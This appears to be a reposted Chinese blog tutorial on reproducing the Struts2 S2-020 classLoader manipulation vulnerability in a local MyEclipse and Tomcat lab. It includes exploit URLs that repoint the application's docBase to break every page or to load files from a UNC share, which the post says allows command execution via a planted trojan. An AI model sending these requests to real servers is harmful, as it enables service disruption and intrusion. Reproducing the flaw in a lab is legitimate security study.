struts2漏洞重现与编译
来源:互联网 发布:扮猪吃老虎 网游 知乎 编辑:程序博客网 时间:2024/04/28 02:03
struts2 S2-020重现以及myeclipse调试classLoader详解<br>1、环境:myeclipse 2013,tomcat 7<br>2、classLoader属性值动态查看:<br> 2.1、 将源码导入到myeclipse,源码下载地址:http://pan.baidu.com/s/1bnGq4wf<br><br> 2.2、设置myeclipse 下通过tomcat7运行<br> 2.2.1、windows->Preferences->myeclipse->Servers 单击Tomcat 7.x将Disable修改为Enabled,将'Tomcat home directory'设置为tomcat的路径。展开Tomcat 7.x树。点击“JDK",增加jdk路径路径为jre1.8.0_25路径,点击"Paths"->”Add JAR/ZIP“,增加tomcat7.0/bin/tomcat-juli.jar,保存。<br> 2.2.2、windows->show view ->Variables<br> 2.2.3、设置index.jsp断点<br> 2.2.4、通过Tomcat 7.0运行调试<br><br> 2.2.5、打开浏览器,访问http://127.0.0.1:8080/strutstest4/index.action,单步执行,查看Variables窗口变量,如下图所示,即可动态查看classLoader的属性值。如下图所示。<br><br>3、s2-020漏洞重现<br> 运行项目,浏览器输入<br>原根路径为<br><br>C:\\Users\\yangxianqu\\Downloads\\apache-tomcat-x86_veryhuo.com\\<br>apache-tomcat-7.0.52\\webapps\\strutstest4<br><br>访问<br><br>http://127.0.0.1:8080/strutstest4/index.action?class.classLoader.resources.dirContext.docBase=C:\\test\\这个不存在的路径之后,之后访问任何页面访问都会是404。重新编译运行该项目,方能恢复正常<br>访问UNC目录<br>访问:<br><br>http://127.0.0.1:8080/strutstest4/index.action?class.classLoader.resources.dirContext.docBase=\\127.0.0.1\pmc\,则打开任何页面实际上访问的是\\127.0.0.1\pmc\目录下的pmc这个项目。只要\\127.0.0.1\pmc\目录下放个任意木马文件,则达到命令执行效果<br><br>
0 0
- struts2漏洞重现与编译
- MS08-067漏洞重现
- Struts2漏洞分析与研究之S2-005漏洞分析
- Struts2漏洞之S2-016漏洞分析与exp编写
- struts2漏洞攻击方法与解决方案
- struts2漏洞
- Struts2漏洞
- struts2漏洞
- Struts2漏洞
- struts2 漏洞
- 重现apache commons fileupload DOS漏洞
- 重现Struts1的操纵classLoader漏洞
- cygwin与漏洞攻击程序的编译
- 溶解与重现
- Struts2漏洞分析与研究之Ognl机制探讨
- CVE-2017-9805(Struts2 漏洞复现与分析)
- [UnityShader3]溶解与重现效果
- 重现
- Struts学习2
- angularjs 上传照片 电脑选取照片 并且预览
- poj3126 prime path
- html5标签video-笔记一
- Material Design简单实践
- struts2漏洞重现与编译
- java多线程编程技术 +代码实例
- 多边形判断模板
- android实现app更新
- codeforces 707 B. Bakery (贪心)
- java中的匿名内部类总结
- Ubuntu在VMware中安装VMtools
- Tableau10.0学习笔记—入门[1]
- eclipse c++ 部署测试目录